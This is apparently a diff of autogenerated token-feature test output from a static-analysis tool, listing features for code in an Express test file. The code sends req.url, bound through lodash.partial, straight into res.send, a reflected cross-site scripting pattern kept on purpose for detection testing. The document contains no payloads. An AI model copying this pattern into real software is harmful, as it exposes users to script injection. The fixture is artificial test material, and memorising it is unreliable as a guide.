y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | exceptional return of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | exceptional return of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | exceptional return of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | exceptional return of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | functio ... OK\\n } | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | functio ... OK\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | functio ... OK\\n } | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | functio ... OK\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | functio ... OK\\n } | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | return of function sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | return of function sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | return of function sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | return of function sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:3:29:3 | return of function sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:12:27:23 | sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:12:27:23 | sendResponse | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:12:27:23 | sendResponse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:27:12:27:23 | sendResponse | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:12:27:23 | sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:12:27:23 | sendResponse | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:12:27:23 | sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:12:27:23 | sendResponse | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:12:27:23 | sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:12:27:23 | sendResponse | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:25:27:25 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:25:27:25 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:25:27:25 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:27:25:27:25 | x | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:25:27:25 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:25:27:25 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:25:27:25 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:25:27:25 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:25:27:25 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:25:27:25 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:28:27:28 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:28:27:28 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:28:27:28 | y | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:27:28:27:28 | y | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:27:28:27:28 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:28:27:28 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:27:28:27:28 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:28:27:28 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:27:28:27:28 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:27:28:27:28 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:7 | res | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:7 | res | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:7 | res | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:7 | res | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:12 | res.send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:12 | res.send | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:12 | res.send | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:12 | res.send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:19 | exceptional return of res.send(x + y) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:19 | exceptional return of res.send(x + y) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:19 | exceptional return of res.send(x + y) | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:19 | exceptional return of res.send(x + y) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:19 | exceptional return of res.send(x + y) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:19 | res.send(x + y) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:19 | res.send(x + y) | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:19 | res.send(x + y) | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:19 | res.send(x + y) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:28:5:28:19 | res.send(x + y) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:28:9:28:12 | send | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:9:28:12 | send | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:9:28:12 | send | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:28:9:28:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:28:9:28:12 | send | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:28:14:28:14 | x | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:14:28:14 | x | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:14:28:14 | x | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:28:14:28:14 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:28:14:28:14 | x | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:28:14:28:14 | x | stringConcatenatedWith | -endpoint- y | | autogenerated/Xss/ReflectedXss/partial.js:28:14:28:18 | x + y | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/partial.js:28:14:28:18 | x + y | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:28:14:28:18 | x + y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | @@ -21680,6 +144408,52 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:28:14:28:18 | x + y | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:28:14:28:18 | x + y | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:28:14:28:18 | x + y | receiverName | res | +| autogenerated/Xss/ReflectedXss/partial.js:28:18:28:18 | y | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:18:28:18 | y | contextSurroundingFunctionParameters | (x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:28:18:28:18 | y | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:28:18:28:18 | y | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:28:18:28:18 | y | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:28:18:28:18 | y | stringConcatenatedWith | x -endpoint- | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:14 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:14 | callback | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:14 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:14 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:14 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:54 | callbac ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:54 | callbac ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:54 | callbac ... eq.url) | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:54 | callbac ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:54 | callbac ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:54 | callback | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:54 | callback | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:54 | callback | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:54 | callback | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:31:7:31:54 | callback | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:23 | lodash | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:23 | lodash | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:23 | lodash | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:23 | lodash | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:23 | lodash | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:31 | lodash.partial | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:31 | lodash.partial | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:31 | lodash.partial | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:31 | lodash.partial | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:31 | lodash.partial | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:54 | exceptional return of lodash. ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:54 | exceptional return of lodash. ... eq.url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:54 | exceptional return of lodash. ... eq.url) | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:54 | exceptional return of lodash. ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:54 | exceptional return of lodash. ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:54 | lodash. ... eq.url) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:54 | lodash. ... eq.url) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:54 | lodash. ... eq.url) | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:54 | lodash. ... eq.url) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:31:18:31:54 | lodash. ... eq.url) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:31:25:31:31 | partial | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:31:25:31:31 | partial | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:31:25:31:31 | partial | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:31:25:31:31 | partial | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:31:25:31:31 | partial | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:31:33:31:44 | sendResponse | CalleeFlexibleAccessPath | lodash.partial | | autogenerated/Xss/ReflectedXss/partial.js:31:33:31:44 | sendResponse | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/partial.js:31:33:31:44 | sendResponse | calleeImports | lodash | @@ -21689,6 +144463,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:31:33:31:44 | sendResponse | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:31:33:31:44 | sendResponse | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:31:33:31:44 | sendResponse | receiverName | lodash | +| autogenerated/Xss/ReflectedXss/partial.js:31:47:31:49 | req | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:31:47:31:49 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:31:47:31:49 | req | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:31:47:31:49 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:31:47:31:49 | req | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:31:47:31:53 | req.url | CalleeFlexibleAccessPath | lodash.partial | | autogenerated/Xss/ReflectedXss/partial.js:31:47:31:53 | req.url | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/partial.js:31:47:31:53 | req.url | calleeImports | lodash | @@ -21698,6 +144477,66 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/partial.js:31:47:31:53 | req.url | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/partial.js:31:47:31:53 | req.url | fileImports | express lodash ramda underscore | | autogenerated/Xss/ReflectedXss/partial.js:31:47:31:53 | req.url | receiverName | lodash | +| autogenerated/Xss/ReflectedXss/partial.js:31:51:31:53 | url | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:31:51:31:53 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:31:51:31:53 | url | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:31:51:31:53 | url | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:31:51:31:53 | url | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:11 | [1, 2, 3] | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:11 | [1, 2, 3] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:11 | [1, 2, 3] | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:11 | [1, 2, 3] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:11 | [1, 2, 3] | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:19 | [1, 2, 3].forEach | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:19 | [1, 2, 3].forEach | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:19 | [1, 2, 3].forEach | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:19 | [1, 2, 3].forEach | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:19 | [1, 2, 3].forEach | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:29 | [1, 2, ... llback) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:29 | [1, 2, ... llback) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:29 | [1, 2, ... llback) | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:29 | [1, 2, ... llback) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:29 | [1, 2, ... llback) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:29 | exceptional return of [1, 2, ... llback) | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:29 | exceptional return of [1, 2, ... llback) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:29 | exceptional return of [1, 2, ... llback) | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:29 | exceptional return of [1, 2, ... llback) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:3:32:29 | exceptional return of [1, 2, ... llback) | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:4:32:4 | 1 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:4:32:4 | 1 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:4:32:4 | 1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:32:4:32:4 | 1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:32:4:32:4 | 1 | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:4:32:4 | 1 | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:4:32:4 | 1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:4:32:4 | 1 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:4:32:4 | 1 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:4:32:4 | 1 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:7:32:7 | 2 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:7:32:7 | 2 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:7:32:7 | 2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:32:7:32:7 | 2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:32:7:32:7 | 2 | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:7:32:7 | 2 | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:7:32:7 | 2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:7:32:7 | 2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:7:32:7 | 2 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:7:32:7 | 2 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:10:32:10 | 3 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:10:32:10 | 3 | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:10:32:10 | 3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/partial.js:32:10:32:10 | 3 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:32:10:32:10 | 3 | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:10:32:10 | 3 | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:10:32:10 | 3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:10:32:10 | 3 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/partial.js:32:10:32:10 | 3 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:10:32:10 | 3 | fileImports | express lodash ramda underscore | +| autogenerated/Xss/ReflectedXss/partial.js:32:13:32:19 | forEach | contextFunctionInterfaces | getFirst(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y)\nsendResponse(x, y) | +| autogenerated/Xss/ReflectedXss/partial.js:32:13:32:19 | forEach | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/partial.js:32:13:32:19 | forEach | enclosingFunctionBody | req res sendResponse x y res send x y callback lodash partial sendResponse req url 1 2 3 forEach callback | +| autogenerated/Xss/ReflectedXss/partial.js:32:13:32:19 | 